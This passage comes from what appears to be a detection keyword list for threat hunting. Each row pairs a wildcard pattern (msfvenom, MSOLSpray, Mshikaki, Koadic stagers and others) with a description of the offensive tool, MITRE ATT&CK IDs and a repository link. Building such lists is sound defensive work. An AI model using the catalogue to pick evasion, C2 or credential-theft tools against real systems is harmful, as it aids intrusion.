open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msf_matchers*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msf_payload.ps1*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance,T1027 - T1027.005 - T1055 - T1211,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/trustedsec/nps_payload,1,1,N/A,9,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z -*msf-auxiliarys*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*msfconsole *,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*msfconsole*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfconsole.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfconsole_spec*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfcrawler.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfd.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfdb --component*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfdb --use-defaults*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfdb_helpers*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfencode*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfJavaToolkit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msf-json-rpc.*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*msf-json-rpc.ru*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msflag.ps1*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*MsfModule*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*msfmodule.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*MsfModuleAsFunction*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*msfpattern.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfpayload*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfpc.sh*,offensive_tool_keyword,msfpc,A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework),T1027 - T1036 - T1564 - T1071 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/g0tmi1k/msfpc,1,0,N/A,N/A,10,1127,274,2021-05-09T13:16:07Z,2015-06-22T12:58:04Z -*msfrelay.py*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msf-revhttps*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*MSFRottenPotato*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*MSFRottenPotato.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msf-sgn.raw*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*msfupdate_spec.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfvemonpayload*,offensive_tool_keyword,cobaltstrike,backdoor c2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wahyuhadi/beacon-c2-go,1,1,N/A,10,10,36,8,2020-01-14T11:15:42Z,2019-12-22T08:59:34Z -*msfvenom *,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*msfvenom -*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*msfvenom -*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*--msfvenom *,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*Mshikaki.exe*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,1,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*Mshikaki-main*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,1,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*mshta/shellcode_inject*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*MSHTAStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*msLDAPDump.py*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*MSOfficeManipulator.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*msol_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*MSOLSpray *,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dafthack/MSOLSpray,1,0,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*MSOLSpray.git*,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dafthack/MSOLSpray,1,1,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*MSOLSpray.ps1*,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dafthack/MSOLSpray,1,1,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*MSOLSpray-master*,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dafthack/MSOLSpray,1,1,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*mspass.exe*,offensive_tool_keyword,mspass,MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/mspass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*mspass.zip*,offensive_tool_keyword,mspass,MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - 